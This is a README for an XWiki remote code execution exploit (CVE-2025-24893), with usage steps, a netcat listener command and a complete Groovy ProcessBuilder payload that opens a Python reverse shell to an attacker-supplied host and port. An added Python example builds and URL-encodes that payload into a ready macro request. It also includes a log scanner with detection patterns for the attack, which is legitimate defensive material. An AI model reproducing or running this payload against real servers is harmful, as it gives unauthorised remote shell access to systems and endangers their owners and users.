# CVE-2025-24893 XWiki RCE Exploit

Modified exploit for CVE-2025-24893.

A simple Python3 script to exploit **CVE-2025-24893**, a remote code execution vulnerability in XWiki Platform, using a Groovy-based async macro and a configurable reverse shell payload.
> **⚠️ WARNING:** This tool is provided **for educational and authorized testing purposes only**. Unauthorized use against systems you do not own or have explicit permission to test is illegal and unethical.
---
## Table of Contents
- [Features](#features)
- [Requirements](#requirements)
- [Installation](#installation)
- [Usage](#usage)
- [Detection & Protocol Fallback](#detection--protocol-fallback)
- [Reverse Shell Payload](#reverse-shell-payload)
- [License](#license)
- [Disclaimer](#disclaimer)
---
## Features
- ✅ Automatically detects whether the target supports HTTPS or HTTP
- ✅ Constructs a Groovy `ProcessBuilder` snippet to avoid `Runtime.exec` quirks
- ✅ URL-encodes the XWiki async+groovy macro payload
- ✅ Configurable reverse shell (host + port)
- ✅ Prints HTTP response code to help verify delivery
---
## Requirements
- Python 3.6 or higher
- [`requests`](https://pypi.org/project/requests/) library
```bash
pip install requests
```
---
## Installation
Clone this repository:
```bash
git clone https://github.com/hackersonsteroids/cve-2025-24893.git
cd cve-2025-24893
```
---
## Usage
```bash
./exploit.py <TARGET_DOMAIN> <LHOST> <LPORT>
```
* `<TARGET_DOMAIN>`
The XWiki host (e.g. `wiki.example.local`).
* `<LHOST>`
Your attacker machine’s IP (where your listener is running).
* `<LPORT>`
Your listener port (integer).
---
### Example
1. Start a listener on your machine:
```bash
nc -lvnp 4444
```
2. Run the exploit:
```bash
./exploit.py wiki.vulnerable.local 10.0.0.5 4444
```
3. On success, check your `netcat` listener for a shell.
---
## Detection & Protocol Fallback
Before sending the payload, the script:
1. Tries `https://<TARGET_DOMAIN>`
2. Falls back to `http://<TARGET_DOMAIN>` if HTTPS fails
3. Exits if neither is reachable
This keeps the script usable against both TLS-terminated and plain-HTTP deployments. Note that any HTTPS failure triggers the fallback, including a rejected certificate, so against a target with a self-signed certificate the payload may be delivered over cleartext HTTP; confirm which scheme was used before relying on the printed response code.
---
## Reverse Shell Payload
By default, the script uses a Python3 reverse-shell one-liner, launched through `/bin/bash -c` from Groovy's `ProcessBuilder`; `LHOST` and `LPORT` are replaced with the values given on the command line:
```groovy
// Default payload template; build_payload() substitutes LHOST and LPORT.
// The list is the argv for ProcessBuilder: bash runs the python3 one-liner,
// which connects back to the listener and attaches /bin/sh to the socket.
new ProcessBuilder([
    '/bin/bash', '-c',
    'python3 -c \'import socket,subprocess,os;' +
    's=socket.socket();s.connect(("LHOST",LPORT));' +
    'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);' +
    'os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])\''
]).redirectErrorStream(true).start()
```
* You can modify the `build_payload()` function if you need a different shell (e.g. Bash, Perl or PHP).
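An added example, not the project's `exploit.py`, showing both sides of the payload above: `build_payload()` fills in `LHOST`/`LPORT` with input validation and URL-encodes the macro as the README says the script does, and a small access-log scanner percent-decodes request targets (repeatedly, so double encoding is not missed) and flags requests carrying both the `async` and `groovy` macros. The `{{async}}`/`{{groovy}}` wrapper is XWiki's documented macro syntax and is an assumption about how the script wraps the snippet; the request path in the sample log lines is constructed and is not the vulnerable endpoint.

```python
"""Added example, not the project's exploit.py: build and URL-encode the
README's Groovy reverse-shell payload, and flag async+groovy macro use in
access-log request targets. The {{async}}/{{groovy}} wrapper is an ASSUMPTION
about how the script wraps the snippet; the log path below is constructed."""
import ipaddress
import re
from urllib.parse import quote, unquote

# The README's Groovy snippet with LHOST/LPORT as str.format placeholders.
GROOVY_TEMPLATE = (
    "new ProcessBuilder(['/bin/bash','-c',"
    "'python3 -c \\'import socket,subprocess,os;"
    "s=socket.socket();s.connect((\"{lhost}\",{lport}));"
    "os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);"
    "subprocess.call([\"/bin/sh\",\"-i\"])\\''"
    "]).redirectErrorStream(true).start()"
)


def build_payload(lhost: str, lport: int) -> str:
    """Fill the listener address into the Groovy snippet, rejecting bad input
    early so a typo does not become a silent no-op on the target."""
    ipaddress.ip_address(lhost)  # README: LHOST is an IP; raises ValueError otherwise
    lport = int(lport)
    if not 1 <= lport <= 65535:
        raise ValueError(f"port out of range: {lport}")
    return GROOVY_TEMPLATE.format(lhost=lhost, lport=lport)


def wrap_macro(groovy: str) -> str:
    """ASSUMPTION: the script wraps the snippet in XWiki's async + groovy macros."""
    return '{{async async="false"}}{{groovy}}' + groovy + "{{/groovy}}{{/async}}"


def encode_payload(macro: str) -> str:
    """Percent-encode everything except unreserved characters for a query string."""
    return quote(macro, safe="")


# --- defender side: spot the same payload in web-server logs ---------------
INDICATORS = ("{{async", "{{groovy", "processbuilder", "runtime.getruntime")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def decode_fully(value: str, limit: int = 5) -> str:
    """Percent-decode until stable so double-encoded payloads are not missed."""
    for _ in range(limit):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_indicators(request_target: str) -> list:
    """Return the macro/Groovy markers present in a decoded request target."""
    text = decode_fully(request_target).lower()
    return [marker for marker in INDICATORS if marker in text]


def scan_log(lines) -> list:
    """Return (line, indicators) for requests carrying both async and groovy macros."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        found = find_indicators(match.group(1))
        if "{{async" in found and "{{groovy" in found:
            hits.append((line, found))
    return hits


# Constructed access-log lines (combined format); the path is hypothetical.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2025:00:00:00 +0000] "GET /xwiki/bin/view/Sandbox/WebHome HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2025:00:00:01 +0000] "GET /xwiki/bin/view/Sandbox/WebHome?q='
    + encode_payload(wrap_macro(build_payload("10.0.0.5", 4444)))
    + ' HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for line, found in scan_log(SAMPLE_LOG):
        print("suspicious:", found, line[:80])
```

The scanner keys on the macro markers rather than on the `python3`/`bash` text, so swapping in a different shell via `build_payload()` does not evade it; a real deployment would also match `{{` written with alternative encodings (e.g. `%7b` in either case, which `unquote` already handles).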
---
## License
This project is licensed under the **MIT License**. See the [LICENSE](LICENSE) file for details.
---
## Disclaimer
This tool is designed for **authorized security assessment** and **educational purposes** only. The authors hold no responsibility for misuse. Always obtain explicit permission before testing any target systems.